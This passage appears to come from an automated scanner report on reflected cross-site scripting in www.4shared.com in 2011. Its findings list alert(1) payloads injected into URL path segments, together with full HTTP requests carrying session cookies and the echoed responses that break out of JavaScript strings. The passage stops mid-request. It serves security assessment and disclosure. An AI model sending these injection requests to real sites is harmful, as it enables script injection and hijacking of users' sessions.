function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/iconsa9d1d"-alert(1)-"62c133ebe14/16x16/pdf.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.33. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80188'-alert(1)-'26d55ecf382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons80188'-alert(1)-'26d55ecf382/16x16/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons80188'-alert(1)-'26d55ecf382/16x16/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:24 GMT
Content-Length: 38843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons80188'-alert(1)-'26d55ecf382/16x16/pdf.gif',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

2.34. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9477"-alert(1)-"b2ce96558c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x16d9477"-alert(1)-"b2ce96558c1/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16d9477"-alert(1)-"b2ce96558c1/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:55 GMT
Content-Length: 38668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x16d9477"-alert(1)-"b2ce96558c1/pdf.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.35. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71d07'-alert(1)-'305d79af2e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x1671d07'-alert(1)-'305d79af2e7/pdf.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x1671d07'-alert(1)-'305d79af2e7/pdf.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:17 GMT
Content-Length: 38664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x1671d07'-alert(1)-'305d79af2e7/pdf.gif',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

funct
...[SNIP]...

2.36. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b6ec"-alert(1)-"2980afcb236 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x16/pdf.gif1b6ec"-alert(1)-"2980afcb236 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/pdf.gif1b6ec"-alert(1)-"2980afcb236
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:34 GMT
Content-Length: 38665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x16/pdf.gif1b6ec"-alert(1)-"2980afcb236";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.37. http://www.4shared.com/icons/16x16/pdf.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/pdf.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54265'-alert(1)-'f35f462a601 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x16/pdf.gif54265'-alert(1)-'f35f462a601 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /icons/16x16/pdf.gif54265'-alert(1)-'f35f462a601
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:02:36 GMT
Content-Length: 38667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
nBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16/pdf.gif54265'-alert(1)-'f35f462a601',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.38. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/png.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8947c'-alert(1)-'4ffa151e255 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons8947c'-alert(1)-'4ffa151e255/16x16/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons8947c'-alert(1)-'4ffa151e255/16x16/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:15 GMT
Content-Length: 38660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons8947c'-alert(1)-'4ffa151e255/16x16/png.gif',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

2.39. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/png.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5909"-alert(1)-"acf9b63f14f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /iconsa5909"-alert(1)-"acf9b63f14f/16x16/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /iconsa5909"-alert(1)-"acf9b63f14f/16x16/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:13 GMT
Content-Length: 38830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/iconsa5909"-alert(1)-"acf9b63f14f/16x16/png.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.40. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/png.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbff8"-alert(1)-"9aa0d811594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x16bbff8"-alert(1)-"9aa0d811594/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16bbff8"-alert(1)-"9aa0d811594/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:25 GMT
Content-Length: 38834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x16bbff8"-alert(1)-"9aa0d811594/png.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.41. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/png.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6157'-alert(1)-'af8b85c81bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x16d6157'-alert(1)-'af8b85c81bc/png.gif HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16d6157'-alert(1)-'af8b85c81bc/png.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:27 GMT
Content-Length: 38831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16d6157'-alert(1)-'af8b85c81bc/png.gif',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

funct
...[SNIP]...

2.42. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/png.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d233'-alert(1)-'19e2d01607d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x16/png.gif2d233'-alert(1)-'19e2d01607d HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16/png.gif2d233'-alert(1)-'19e2d01607d
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:41 GMT
Content-Length: 38832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
nBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16/png.gif2d233'-alert(1)-'19e2d01607d',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.43. http://www.4shared.com/icons/16x16/png.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/png.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4750e"-alert(1)-"1afa87bf6ef was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /icons/16x16/png.gif4750e"-alert(1)-"1afa87bf6ef HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463

Response

HTTP/1.1 404 /icons/16x16/png.gif4750e"-alert(1)-"1afa87bf6ef
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:58:38 GMT
Content-Length: 38832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x16/png.gif4750e"-alert(1)-"1afa87bf6ef";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.44. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/asf-logo.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76784'-alert(1)-'f0ffe45a1df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images76784'-alert(1)-'f0ffe45a1df/asf-logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images76784'-alert(1)-'f0ffe45a1df/asf-logo.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:27 GMT
Content-Length: 38809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images76784'-alert(1)-'f0ffe45a1df/asf-logo.gif',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

2.45. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/asf-logo.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4e12"-alert(1)-"2e7080de009 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imagesc4e12"-alert(1)-"2e7080de009/asf-logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /imagesc4e12"-alert(1)-"2e7080de009/asf-logo.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:25 GMT
Content-Length: 38811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/imagesc4e12"-alert(1)-"2e7080de009/asf-logo.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.46. http://www.4shared.com/images/asf-logo.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/asf-logo.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b95f'-alert(1)-'1357208e352 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images/asf-logo.gif6b95f'-alert(1)-'1357208e352 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
